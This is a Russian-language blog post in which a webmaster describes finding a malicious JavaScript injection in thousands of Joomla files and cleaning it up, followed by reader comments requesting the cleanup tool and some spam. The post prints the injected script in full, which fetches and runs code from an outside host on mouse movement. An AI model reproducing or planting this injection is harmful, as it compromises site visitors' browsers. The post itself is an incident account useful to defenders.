Охота на вирус. Вредоносный JS скрипт на Joomla : WEB-чайник

WEB-чайник

Как создать, оптимизировать и монетизировать сайт — советы "чайника"

wordpress themes.
RSS
Twitter

No public Twitter messages.


Tweet

Утром, включая ноут, первым делом прогуливаюсь по всем сайтам, смотрю посещаемость, осматриваю владения, так сказать. И вот зайдя на молоденький автосайт, вместо картинки главной странички наблюдаю сообщение, что в такой-то строке index.php ошибка. Начинаю судорожно соображать, не делала ли я чего недозволительного с сайтом вечером, по всему выходило, что ошибка возникла на пустом месте.

Отправляюсь по указанному адресу и наблюдаю там следующее:

<script type=»text/javascript» src=»https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js»></script><script type=»text/javascript»>var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’, function() {flag = 2;});}});});</script>

Это мерзопакостность была добавлена в самом конце файла. Попыталась разобраться, что это, поняла, что это явно не мое и с чистой совестью удалила. Обновляю сайт, пишет, что очередная ошибка поджидает в файле menu, в итоге прошлась по 10 файлов, в конце каждого из них была прописана эта строка. Сайт заработал, а я начала ругать себя за глупость — не гланула дату последнего редактирования файлов с вышеупомянутой строкой. Как оказалось, ругала напрасно.

Подобным скриптом оказались заражены все файлы menu, index, default (php, js, html)/. Те, кто сталкивался с джумлой, поймут, почему у меня волосы на голове от ужаса зашевелились — там тысячи файлов index.html, каждый из которых заражен этим скриптом. Поначалу вычищала вручную, через час у меня уже плыло все в глазах и взялась изучать интернет на наличие автоматизированных чистильщиков, иными словами антивируса. К счастью, такой нашелся. Файлик загружается в корень сайта, потом запускается и ты получаешь страничку, где показаны все зараженные файлы. Остается только просмотреть и нажимать «лечить» напротив больных.  Дело пошло веселее, но даже с антивирусом ушло немало времени.

К слову, подобная же вещь нашлась ещё на 4 сайтах, лежавших на том же хостинге. Сказать, что я была зла — это не сказать ничего. Поменяла пароль на фтп, надеюсь, что эта напасть меня больше не коснется. Чего и вам желаю.

Пы.сы. Кому нужен этот самый антивирус, пишитесь в комментах, вышлю. Позже создам страничку с ссылками, по которым можно будет скачать кучу мелких полезностей для сайта.

Комментарии



  1. Sezam:

    Привет! Такая же проблема, можно ссылку на sezam@inbox.ru !

  2. lyoshkin:

    Добрый день
    Эта же проблема
    можно ссылку на ipogosyan@mail.ru

  3. pushed:

    Здравствуйте, похожая проблема, прошу линк на pushed@mail.ru

  4. Ольга:

    Здравствуйте, буду благодарна за ссылочку! sunsara2008@yandex.ru

  5. Коля:

    Ух, тоже прошу ссылочку…

  6. Boris:

    Если можно, и мне этот чудодейственный скрипт, спасибо. cmirnow@gmail.com

  7. михаил:

    отправьте и мне плиз эту программу. спасибо

  8. Валерий:

    можно и мне такую программку? спасибо!

  9. Andrey:

    пришлите, пожалуйста, тоже понадобилась

  10. Эдуард:

    Здравствуйте!
    Тоже попался на подобную шляпу! Спасибо!

  11. Sgirnitch:

    Здравствуйте! Для WordPress есть подобный?

  12. Наталья:

    Здравствуйте! Два моих сайта тоже на Joomla, пока таких проблем не было, но береженого, как говориться… Скиньте тоже ссылочку, если не жалко. Вообще, хочу сказать спасибо за Ваш сайт и интересные материалы. Вчера почитала Вашу статью про Mirtesen, зарегистрировалась и прокомментировала 2 темы. Через 20 минут на сайте было 30 посетителей онлайн, хотя сайт не доделан и даже еще не в индексе. Спасибо!

  13. Роман:

    Та же проблема, пришлите пожалуйста и мне такую же прогу. Если имеется и маленький FAQ
    Спасибо.

  14. Игорь:

    Здравствуйте. Будьте добры ссылочку. А то у меня точно конец света будет)

  15. Виталий:

    Дайте пожалуйста ссылочку, напасть на сайте такая, что уже зла не хватает…

  16. имне!:

    и мне, пожалуйста!

  17. Юрий:

    меня коснулась та же проблема. Можно программку.

  18. ipdj:

    Спасайте! HELP!!!! SOS!!!!!!!!!!!!!!!!!!!! дайте пожалуйста антивирусник!!!!! оч. надо!!!!!

  19. !:

    Нужна эта программа, скиньте пожалуйста

  20. Driver:

    Буду благодарен за ссылку на чудо лекаря. 10 сайтов я устану вручную лечить :(

  21. иван:

    В ожидании чуда )

  22. Макс:

    У меня возникли аналогичные ситуации, пожалуйста, поделитесь скриптом :)

  23. Свргей:

    Я понимаю, что прошло много времени от почти всех сообщений, но может поможете и мне?!

    Очень необходимо, просто СОС!

    Если имеется и маленький FAQ

    Заранее большое спасибо.

  24. Белвест:

    Качаем антивирус для Joomla здесь!
    http://белгород-сайт.рф/blog/100-joomla-virus

  25. Сергей:

    Привет. Можно и мне этот файлик на почту получить плиз. Спасибо за внимание.

  26. zapdas:

    Здравствуйте!
    Сегодня произошла такая же проблема, дайте пожалуйста антивирусик?

  27. Игорь:

    Будьте добры и мне ссылочку на антивирус или на почту

  28. Andrey:

    Здравствуйте!
    Отправьте пожалуйста и мне лекарство (желательно с инструкцией))
    Спасибо!

  29. Yvette:

    I do not leave a response, however I looked through a few remarks here Охота
    на вирус. Вредоносный JS скрипт на
    Joomla : WEB-чайник. I do have 2 questions for you if it’s allright.
    Could it be just me or do a few of these remarks appear as if they
    are coming from brain dead folks? :-P And, if you are writing on
    other places, I’d like to follow anything new you have to post.
    Would you post a list of the complete urls of your shared pages like your twitter
    feed, Facebook page or linkedin profile?

    My blog post buy cheap snapbacks

Что лучше: �

Так, например, если рассматривать сайты под сапу, то, по моему ...

Виртуальны

Лично я когда-то давно долго выбирала между конторами, предлагающими виртуальный ...

Планы на 2023

Первой целью на этот год я ставлю улучшение связи в ...

Внутренние

Главным критерием, определения релевантности страницы сайта, как известно являются ключевые ...

А нужна ли �

Естественно, что такая ситуация мало, кого устраивает. И посетители попросту ...

Зарегистри

 Получить его проще простого, нужно лишь зарегистрировать домен у reg.ru ...

Конкурс и б

  И что же делать? Я предлагаю вам поучаствовать в конкурсе ...

Как мне улы

Вот, помнится, в начале моей райтерской карьеры ко мне в ...

Кем я вижу �

Читатели моего блога уже знают, каким образом я вообще попала ...

Наши партнеры

  • Зарабатывай на своем блоге!

in aj lee online